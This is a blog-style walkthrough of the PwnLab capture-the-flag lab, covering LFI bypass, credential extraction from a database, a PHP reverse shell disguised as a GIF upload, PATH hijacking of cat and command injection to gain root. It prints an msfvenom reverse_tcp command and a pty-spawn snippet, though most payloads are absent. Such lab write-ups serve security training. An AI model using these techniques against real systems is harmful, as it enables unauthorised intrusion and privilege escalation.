PwnLab CTF Walkthrough

Hi folks, today we will walkthrough the PwnLab CTF penetration testing challenge. You can find this interesting vm Here. As stated by the author our goal is to root the box and find out the flag.txt file so let's start ;)

As an enumeration part i fired up nmap to find out different services running on target machine.

I noticed that ports 80(for http) and 3306(for Mysql) open, next i deiced to run nikto to get some juicy information.

nikto give me hint that config.php file contains username and password, so now i need to find out a way to read config.php. I quickly goto in order to access web and find out possibility of LFI.

next i tried with to inject simple LFI payload but nothing happened.

so i decided to find out some ways to bypass LFI protection and got my friend Aaditya's blog with a nice write-up after that i injected the following payload and got data from config.php

next i decoded this data with base64 encoding and got the database credentials as shown below

so now we have database credentials let's access the database.

Let's look inside the users table

 Bam ! we got the username and password, Passwords looks like base64 encoded let's decode them and login :)

Here we have a option to upload file, so as an attacker mind i tried to upload php file but not allowed to so next the idea came to my mind that i can check the source code of upload.php file using LFI vulnerability.

As shown its allowing only four extensions and also checking for MIME types after digging i found a way to shell it.

 msfvenom -p php/meterpreter/reverse_tcp lhost= lport=31337 -f raw

this command will create a reverse shell which is bound to our IP with a particular port
the result of this command looks like

or you can use any other reverse shell next all you need to do is to copy the code from <?php to die(); and then create a file with GIF extension and add GIF98 in the first line and then paste the code which looks like.

Let's upload this ;)

and the file is uploaded successfully next we need to evaluate this shell code so that our reverse shell can connect with us. After digging alot i found that in the index.php file Lang parameter is vulnerable to LFI so i started tamper data to tamper the request and quickly goto in meanwhile i started metasploit and setup the exploit with the following commands.

As shown above we have filed all the required options to exploit so type exploit and move further to tamper the request in order to inject lang parameter.

Basically here we are executing our malicious code so as soon as you hit okay we will get the meterpreter session.

Now we have our shell but still its limited, let's first get a stable shell so first we need to confirm that whether python is install or not and then we can create a simple stable shell as shown below.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/
python /tmp/

As we have login credentials of 3 different users let's login and look for further hints.

After digging around the can's directory i found a file called msgmike. I tired to access it but not allowed so i figured out that its actually using cat without absolute path.

So further created a cat command and exported the path as following 

Again after digging around the mike's directories i found a interesting file called msg2root.
later i found out that its echoing back everything so i tried to execute commands with it.
then i setup natcat listing to port 1337 and executed the following command.

and here you go ;)


Popular posts from this blog

How I bypassed 2-Factor Authentication in a bug bounty program